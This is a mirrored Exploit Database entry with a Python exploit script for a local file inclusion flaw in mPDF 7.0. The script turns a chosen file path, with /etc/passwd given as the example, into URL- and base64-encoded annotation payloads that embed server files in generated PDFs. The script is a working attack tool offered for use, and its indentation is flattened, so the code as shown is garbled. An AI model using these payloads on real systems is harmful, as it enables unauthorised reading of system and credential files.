mPDF 7.0 – Local File Inclusion

• Exploit Database
• 14 阅读

• 作者： Musyoka Ian
  日期： 2022-08-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50995/

• # Exploit Title: mPDF 7.0 - Local File Inclusion
  # Google Dork: N/A
  # Date: 2022-07-23
  # Exploit Author: Musyoka Ian
  # Vendor Homepage: https://mpdf.github.io/
  # Software Link: https://mpdf.github.io/
  # Version: CuteNews
  # Tested on: Ubuntu 20.04, mPDF 7.0.x
  # CVE: N/A
  
  #!/usr/bin/env python3
  
  from urllib.parse import quote
  from cmd import Cmd
  from base64 import b64encode
  
  class Terminal(Cmd):
  prompt = "\nFile >> "
  def default(self, args):
  payload_gen(args)
  def banner():
  banner = """________________ ______ _____ ___ _ _ 
   |__ \|__ \|____| |____/ _ \ \ \ / / | | (_) |
   _ __ ___| |__) | || | |__/ / | | | \ V /________ __ | | ____| |_ 
   | '_ ` _ \|___/| || |__|/ /| | | |> </ _ \ \/ / '_ \| |/ _ \| | __|
   | | | | | | || |__| | |/ / | |_| | / . \|__/><| |_) | | (_) | | |_ 
   |_| |_| |_|_||_____/|_| /_/ (_)___(_)_/ \_\\___/_/\_\ .__/|_|\___/|_|\__|
   | |
   |_| """
  print(banner)
  def payload_gen(fname):
  payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'
  encoded_payload = quote(payload)
  print("[+] Replace the content with the payload below")
  
  print(f"Url encoded payload:\n{encoded_payload}\n")
  base64enc = b64encode(encoded_payload.encode())
  print(f"Base64 encoded payload:\n{base64enc.decode()}\n")
  if __name__ == ("__main__"):
  banner()
  print("Enter Filename eg. /etc/passwd")
  terminal= Terminal()
  terminal.cmdloop()